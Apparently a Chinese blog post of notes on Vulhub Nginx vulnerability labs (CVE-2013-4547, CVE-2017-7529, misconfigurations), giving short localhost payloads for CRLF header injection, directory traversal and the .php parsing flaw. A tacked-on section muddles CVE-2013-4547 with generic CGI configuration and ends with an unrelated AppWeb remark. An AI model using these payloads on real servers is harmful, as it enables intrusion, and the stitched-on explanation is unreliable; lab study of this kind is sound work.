vulhub-nginx

CVE-2013-4547

影响范围
Nginx 0.8.41~1.4.3
Nginx 1.5.0~1.5.7

CVE-2017-7529越界读取缓存漏洞

影响范围
Nginx version 0.5.6 - 1.13.2
在这里插入图片描述

insecure-configuration

CRLF注入漏洞

Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。
payload:http://127.0.0.1/%0a%0dSet-Cookie:%20a=1%0a%0d%0a%0d%0a<!–

在这里插入图片描述

目录穿越漏洞

payload:http://127.0.0.1:8081/files…/

add_header被覆盖

payload:http://127.0.0.1:8082/test2#

nginx解析漏洞

原请求为http://127.0.0.1/uploadfiles/nginx.png
payload为:http://127.0.0.1/uploadfiles/nginx.png/.php

### Vulhub 中的 CGI 安全漏洞示例配置 #### Nginx 配置文件设置 为了展示如何通过 Vulhub 复现与 CGI 相关的安全漏洞,可以考虑使用 Nginx 的 CVE-2013-4547 漏洞作为例子。此漏洞允许攻击者利用特定条件下的 HTTP 请求来读取任意文件的内容。 在 `nginx.conf` 文件中,通常会包含如下配置片段用于启用 CGI 支持: ```nginx location /cgi-bin/ { root html; fastcgi_pass unix:/tmp/fcgi.sock; include fastcgi_params; } ``` 上述配置指定了 `/cgi-bin/` 路径下请求会被转发给 FastCGI 进程处理,并设置了 Unix 套接字路径以及包含了标准参数定义[^1]。 #### Docker Compose 启动命令 要启动带有该漏洞的环境,在 vulhub-master 下对应目录执行以下指令即可完成服务部署: ```bash sudo docker-compose up -d ``` 这条命令将会以后台模式运行容器化应用实例并保持其持续运作状态[^2]。 #### 测试访问点确认 一旦环境准备就绪,可以通过浏览器或其他工具向目标 URL 发送精心构造的数据包来进行测试。对于某些情况下可能还需要进一步操作才能触发预期行为,比如进入正在运行的服务内部查看临时文件是否存在等情况: ```bash docker-compose exec web bash ls /tmp/ ``` 这一步骤有助于验证是否能够成功创建指定位置上的标记文件,从而证明存在潜在风险[^3]。 尽管 AppWeb 是一个设计上注重安全性考量的小型高效 Web 服务器解决方案,但在实际环境中仍需谨慎对待任何第三方组件引入所带来的未知威胁因素[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值